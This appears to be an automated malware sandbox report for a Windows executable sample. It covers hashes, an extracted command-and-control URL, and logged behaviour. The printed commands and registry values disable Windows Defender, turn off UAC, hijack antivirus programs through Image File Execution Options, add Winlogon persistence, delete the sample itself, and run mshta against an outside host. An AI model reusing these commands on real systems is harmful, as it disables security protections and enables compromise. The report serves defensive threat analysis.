Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19/09/2024, 05:14
Static task
static1
Behavioral task
behavioral1
Sample
eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe
-
Size
2.2MB
-
MD5
eaa6966575d28fa84ddcf3ba17c4d07e
-
SHA1
f5f44be0cb637bea6348e506ee94136bb41bfa8f
-
SHA256
16fed893171b69ceb22b85992f486ff2fd45d26de273deced2fb46b2517d755f
-
SHA512
57769e221cf3127284ded0c043d977168a7d5395abc2d095cbbd7564f0e5bae5574100e1364df2116e29db4244eea87d344041983c2a62328f3a12f24f72060d
-
SSDEEP
49152:mDwQZshctg3xglTVGI8HoBfAIPYiiqowvq00p7PiKXT0phLdlh:mDwQEuUxglcI8HoiIrwzXopZdL
Malware Config
Extracted
http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=UPNECVIU&2=i-s&3=17&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\phyfre.exe" phyfre.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" phyfre.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" phyfre.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" phyfre.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" phyfre.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" phyfre.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe phyfre.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" phyfre.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe phyfre.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" phyfre.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" phyfre.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" phyfre.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe phyfre.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe phyfre.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe phyfre.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" phyfre.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe phyfre.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe phyfre.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe phyfre.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" phyfre.exe -
Deletes itself 1 IoCs
pid Process 2700 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2620 phyfre.exe -
Loads dropped DLL 2 IoCs
pid Process 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" phyfre.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2264 sc.exe 2880 sc.exe 2632 sc.exe 1644 sc.exe 2896 sc.exe 2720 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language phyfre.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2620 phyfre.exe Token: SeShutdownPrivilege 2620 phyfre.exe Token: SeDebugPrivilege 2620 phyfre.exe Token: SeShutdownPrivilege 2620 phyfre.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe 2620 phyfre.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 1800 wrote to memory of 2720 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 30 PID 1800 wrote to memory of 2720 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 30 PID 1800 wrote to memory of 2720 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 30 PID 1800 wrote to memory of 2720 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 30 PID 1800 wrote to memory of 2264 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 31 PID 1800 wrote to memory of 2264 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 31 PID 1800 wrote to memory of 2264 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 31 PID 1800 wrote to memory of 2264 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 31 PID 1800 wrote to memory of 2768 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 33 PID 1800 wrote to memory of 2768 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 33 PID 1800 wrote to memory of 2768 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 33 PID 1800 wrote to memory of 2768 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 33 PID 1800 wrote to memory of 2880 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 34 PID 1800 wrote to memory of 2880 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 34 PID 1800 wrote to memory of 2880 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 34 PID 1800 wrote to memory of 2880 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 34 PID 1800 wrote to memory of 2620 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 38 PID 1800 wrote to memory of 2620 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 38 PID 1800 wrote to memory of 2620 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 38 PID 1800 wrote to memory of 2620 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 38 PID 2768 wrote to memory of 2308 2768 net.exe 39 PID 2768 wrote to memory of 2308 2768 net.exe 39 PID 2768 wrote to memory of 2308 2768 net.exe 39 PID 2768 wrote to memory of 2308 2768 net.exe 39 PID 1800 wrote to memory of 2700 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 40 PID 1800 wrote to memory of 2700 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 40 PID 1800 wrote to memory of 2700 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 40 PID 1800 wrote to memory of 2700 1800 eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe 40 PID 2620 wrote to memory of 2896 2620 phyfre.exe 42 PID 2620 wrote to memory of 2896 2620 phyfre.exe 42 PID 2620 wrote to memory of 2896 2620 phyfre.exe 42 PID 2620 wrote to memory of 2896 2620 phyfre.exe 42 PID 2620 wrote to memory of 1644 2620 phyfre.exe 43 PID 2620 wrote to memory of 1644 2620 phyfre.exe 43 PID 2620 wrote to memory of 1644 2620 phyfre.exe 43 PID 2620 wrote to memory of 1644 2620 phyfre.exe 43 PID 2620 wrote to memory of 2612 2620 phyfre.exe 44 PID 2620 wrote to memory of 2612 2620 phyfre.exe 44 PID 2620 wrote to memory of 2612 2620 phyfre.exe 44 PID 2620 wrote to memory of 2612 2620 phyfre.exe 44 PID 2620 wrote to memory of 2632 2620 phyfre.exe 46 PID 2620 wrote to memory of 2632 2620 phyfre.exe 46 PID 2620 wrote to memory of 2632 2620 phyfre.exe 46 PID 2620 wrote to memory of 2632 2620 phyfre.exe 46 PID 2612 wrote to memory of 2664 2612 net.exe 49 PID 2612 wrote to memory of 2664 2612 net.exe 49 PID 2612 wrote to memory of 2664 2612 net.exe 49 PID 2612 wrote to memory of 2664 2612 net.exe 49 PID 2620 wrote to memory of 524 2620 phyfre.exe 51 PID 2620 wrote to memory of 524 2620 phyfre.exe 51 PID 2620 wrote to memory of 524 2620 phyfre.exe 51 PID 2620 wrote to memory of 524 2620 phyfre.exe 51 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System phyfre.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" phyfre.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" phyfre.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" phyfre.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2264
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:2308
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2880
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\phyfre.exeC:\Users\Admin\AppData\Roaming\Microsoft\phyfre.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2620 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2896
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1644
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:2664
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=UPNECVIU&2=i-s&3=17&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:524
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EAA696~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2700
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5eaa6966575d28fa84ddcf3ba17c4d07e
SHA1f5f44be0cb637bea6348e506ee94136bb41bfa8f
SHA25616fed893171b69ceb22b85992f486ff2fd45d26de273deced2fb46b2517d755f
SHA51257769e221cf3127284ded0c043d977168a7d5395abc2d095cbbd7564f0e5bae5574100e1364df2116e29db4244eea87d344041983c2a62328f3a12f24f72060d